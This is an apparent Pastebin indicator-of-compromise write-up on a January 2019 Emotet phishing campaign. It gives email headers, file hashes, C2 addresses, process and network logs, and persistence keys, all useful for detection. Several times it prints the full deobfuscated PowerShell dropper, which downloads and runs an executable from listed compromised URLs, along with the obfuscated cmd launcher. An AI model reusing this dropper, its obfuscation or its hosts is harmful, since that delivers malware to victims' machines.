Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #IOC #OptiData #VR #emotet #feodo #banker #xml #powershell
- https://pastebin.com/D9TDts5J
- previous contact:
- 20/12/18 https://pastebin.com/EejcbL4t
- 04/12/18 https://pastebin.com/znQDtbnt
- 09/11/18 https://pastebin.com/THHMs2wg
- 01/10/18 https://pastebin.com/Y6DnbpHv
- FAQ:
- https://twitter.com/dvk01uk/status/1087660817452011520
- https://pastebin.com/g8gMJKui
- https://radetskiy.wordpress.com/2018/10/19/ioc_emotet_011018/
- https://kc.mcafee.com/corporate/index?page=content&id=KB90108
- attack_vector
- --------------
- email attach .doc (XML) > macro > cmd > powershell_v5(!) > GET 5 URL > %temp%\***.exe
- email_headers
- --------------
- Received: from ded1262.inmotionhosting.com (ded1262.inmotionhosting.com [173.247.255.190])
- by srv8.victim1.com (8.15.2/8.15.2) for <user0@org7.victim1.com>;
- Thu, 24 Jan 2019 07:33:34 +0200 (EET)
- (envelope-from jonathan.contreras@grupodecme.com.mx)
- Received: from [104.152.233.226] (port=53273 helo=10.15.58.80)
- by ded1262.inmotionhosting.com with esmtpsa
- (envelope-from <jonathan.contreras@grupodecme.com.mx>)
- for user0@org7.victim1.com;
- Wed, 23 Jan 2019 07:49:42 -0800
- Date: Wed, 23 Jan 2019 07:49:38 -0800
- From: С ув.Андрей Сикорский 066-105-91-55,093-992-66-84 b2motor.com <jonathan.contreras@grupodecme.com.mx>
- To: user0@org7.victim1.com
- Subject: Aw: Outstanding INVOICE XPAHS/2921629/1194
- files
- --------------
- SHA-256 339c428878402bf90c1ff0653d51626cfa6adff27a13adf75a42ed26d138b59f
- File name FILE-T00978774.doc
- File size 258.31 KB
- SHA-256 1e95b89a23fc36786d336b4bfd4c0a6fb84630bb62e34270da6b604fd9bf7d8a
- File name aBQ0J3QEI0nmVgZS0xq.exe [from galvanengenharia.com 1st]
- File size 229.5 KB
- SHA-256 f8e3c1cf0eafcbd54f0e26dbb7ca108a0a3f3a97546504af8a9e03ee75949189
- File name XisJxx7N143.exe [from imarketsforextrading.com]
- File size 238.5 KB
- SHA-256 829c9c9d7d1f238e97bd3307392dad0f1537906505b694f1199ec9ddbee3bd52
- File name f76rt7cruttl6.exe [from galvanengenharia.com 2nd]
- File size 242 KB
- activity
- **************
- powershell
- powershtll
- deobfuscated_macro
- --------------
- command: powershell $ntij='vcshw';$fkkv=new-object Net.WebClient;$jrpoz='imarketsforextrading{.} com/vpFtztlmbWLmXZWL@gencbafralilar{.} com/wp-admin/css/MSTealncf2Y_JI@north-bear{.} ru/SLiZjYZC4ZYAVon@galvanengenharia{.} com/NLuJg0pMQ6qrvYd4G_c0@nancybrouwer{.} nl/D8LOhbAH25ha'.Split('@');$qsqp='iowi';$bddaq = '168';$cuvfr='vwlui';$jbbj=$env:temp+'\'+$bddaq+'.exe';foreach($douz in $jrpoz){try{$fkkv.DownloadFile($douz, $jbbj);$ijqu='acino';If ((Get-Item $jbbj).length -ge 40000) {Invoke-Item $jbbj;$qpop='psah';break;}}catch{}}$zwpth='ibah';
- pl_src: 1/5
- --------------
- imarketsforextrading{.} com/vpFtztlmbWLmXZWL/ not_downld
- gencbafralilar{.} com/wp-admin/css/MSTealncf2Y_JI 404
- north-bear{.} ru/SLiZjYZC4ZYAVon 503
- galvanengenharia{.} com/NLuJg0pMQ6qrvYd4G_c0/ 200
- nancybrouwer{.} nl/D8LOhbAH25ha blocked
- C2:
- --------------
- 182.180.170.72:22
- 189.253.39.50:8080
- netwrk
- --------------
- 104.225.130.135 www.imarketsforextrading.com GET /vpFtztlmbWLmXZWL HTTP/1.1 noUA
- 5.250.241.110 gencbafralilar.com GET /wp-admin/css/MSTealncf2Y_JI HTTP/1.1 noUA
- 92.53.114.3 north-bear.ru GET /SLiZjYZC4ZYAVon HTTP/1.1 noUA
- 191.6.205.20 galvanengenharia.com GET /NLuJg0pMQ6qrvYd4G_c0 HTTP/1.1 noUA
- 189.253.39.50 189.253.39.50:8080 GET / HTTP/1.1 Mozilla/4.0
- comp
- --------------
- powershtll.exe 1152 104.225.130.135 80 ESTABLISHED
- powershtll.exe 1152 5.250.241.110 80 ESTABLISHED
- powershtll.exe 1152 92.53.114.3 80 ESTABLISHED
- powershtll.exe 1152 191.6.205.20 80 ESTABLISHED
- turnedbased.exe 2488 182.180.170.72 22 SYN_SENT
- turnedbased.exe 2488 189.253.39.50 8080 ESTABLISHED
- proc
- --------------
- c:\rjbv\qwqqb\mclaw\..\..\..\windows\system32\cmd.exe /c CmD /V:/C"set 78QN=Ue%x5FNB4D':drkCP@u{(XinhY$.byo1pq_)Ac6ETS3vH2V0+g,~ZGOQa=J z\l-wjL}/tf;m8MWIs&&for %X in (...)do set p0QM=!p0QM!!78QN:~%X,1!&&if %X gtr 78 echo !p0QM:~6!|FOR /F "tokens=2 delims==fkCg" %e IN ('assoc.cmd')DO %e "
- CmD /V:/C"set 78QN=Ue%x5FNB4D':drkCP@u{(XinhY$.byo1pq_)Ac6ETS3vH2V0+g,~ZGOQa=J z\l-wjL}/tf;m8MWIs&&for %X in (...)do set p0QM=!p0QM!!78QN:~%X,1!&&if %X gtr 78 echo !p0QM:~6!|FOR /F "tokens=2 delims==fkCg" %e IN ('assoc.cmd')DO %e "
- C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $ntij='vcshw';$fkkv=new-object Net.WebClient;$jrpoz='http://www.imarketsforextrading.com/vpFtztlmbWLmXZWL@http://gencbafralilar.com/wp-admin/css/MSTealncf2Y_JI@http://north-bear.ru/SLiZjYZC4ZYAVon@http://galvanengenharia.com/NLuJg0pMQ6qrvYd4G_c0@http://nancybrouwer.nl/D8LOhbAH25ha'.Split('@');$qsqp='iowi';$bddaq = '168';$cuvfr='vwlui';$jbbj=$env:temp+'\'+$bddaq+'.exe';foreach($douz in $jrpoz){try{$fkkv.DownloadFile($douz, $jbbj);$ijqu='acino';If ((Get-Item $jbbj).length -ge 40000) {Invoke-Item $jbbj;$qpop='psah';break;}}catch{}}$zwpth='ibah';"
- C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=2 delims==fkCg" %e IN ('assoc.cmd') DO %e "
- C:\Windows\system32\cmd.exe /c assoc.cmd
- cmd
- powershtll $ntij='vcshw';$fkkv=new-object Net.WebClient;$jrpoz='http://www.imarketsforextrading.com/vpFtztlmbWLmXZWL@http://gencbafralilar.com/wp-admin/css/MSTealncf2Y_JI@http://north-bear.ru/SLiZjYZC4ZYAVon@http://galvanengenharia.com/NLuJg0pMQ6qrvYd4G_c0@http://nancybrouwer.nl/D8LOhbAH25ha'.Split('@');$qsqp='iowi';$bddaq = '168';$cuvfr='vwlui';$jbbj=$env:temp+'\'+$bddaq+'.exe';foreach($douz in $jrpoz){try{$fkkv.DownloadFile($douz, $jbbj);$ijqu='acino';If ((Get-Item $jbbj).length -ge 40000) {Invoke-Item $jbbj;$qpop='psah';break;}}catch{}}$zwpth='ibah';
- C:\tmp\168.exe
- C:\Users\operator\AppData\Local\turnedbased\turnedbased.exe
- (old)
- "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
- c:\rjbv\qwqqb\mclaw\..\..\..\windows\system32\cmd.exe .... gtr 78 echo !p0QM:~6!|FOR /F "tokens=2 delims==fkCg" %e IN ('assoc.cmd')DO %e "
- CmD /V:/C"set 78QN=Ue%x5FNB4D':drkCP@u... gtr 78 echo !p0QM:~6!|FOR /F "tokens=2 delims==fkCg" %e IN ('assoc.cmd')DO %e "
- C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll ...
- C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=2 delims==fkCg" %e IN ('assoc.cmd') DO %e "
- C:\Windows\system32\cmd.exe /c assoc.cmd
- C:\Windows\system32\cmd.exe powershell $ntij='vcshw';$fkkv=new-object Net.WebClient;... $jbbj=$env:temp+'\'+$bddaq+'.exe';... {Invoke-Item $jbbj;$qpop='psah';break;}}catch{}}$zwpth='ibah';
- "C:\Users\operator\AppData\Local\Temp\168.exe"
- "C:\Users\operator\AppData\Local\Temp\168.exe"
- "C:\Users\operator\AppData\Local\wabmetagen\wabmetagen.exe"
- "C:\Users\operator\AppData\Local\wabmetagen\wabmetagen.exe"
- persist
- --------------
- HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 25.01.2019 14:39
- turnedbased 3dfxTools Common Library 3dfx Interactive, Inc.
- c:\users\operator\appdata\local\turnedbased\turnedbased.exe 25.01.2019 22:40
- drop
- --------------
- C:\tmp\168.exe
- C:\Users\operator\AppData\Local\turnedbased\turnedbased.exe
- # # #
- https://www.virustotal.com/#/file/339c428878402bf90c1ff0653d51626cfa6adff27a13adf75a42ed26d138b59f/details
- https://www.virustotal.com/#/file/1e95b89a23fc36786d336b4bfd4c0a6fb84630bb62e34270da6b604fd9bf7d8a/details
- https://analyze.intezer.com/#/analyses/af88b324-e56b-4fd1-a8af-25a97d0163f2
- https://www.virustotal.com/#/file/f8e3c1cf0eafcbd54f0e26dbb7ca108a0a3f3a97546504af8a9e03ee75949189/details
- https://analyze.intezer.com/#/analyses/20ce9259-1f35-41b9-8eb1-7d1408865a77
- https://www.virustotal.com/#/file/829c9c9d7d1f238e97bd3307392dad0f1537906505b694f1199ec9ddbee3bd52/details
- https://analyze.intezer.com/#/analyses/200c4e09-f2ea-42c2-a803-1f98537d92af
- VR
- @
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement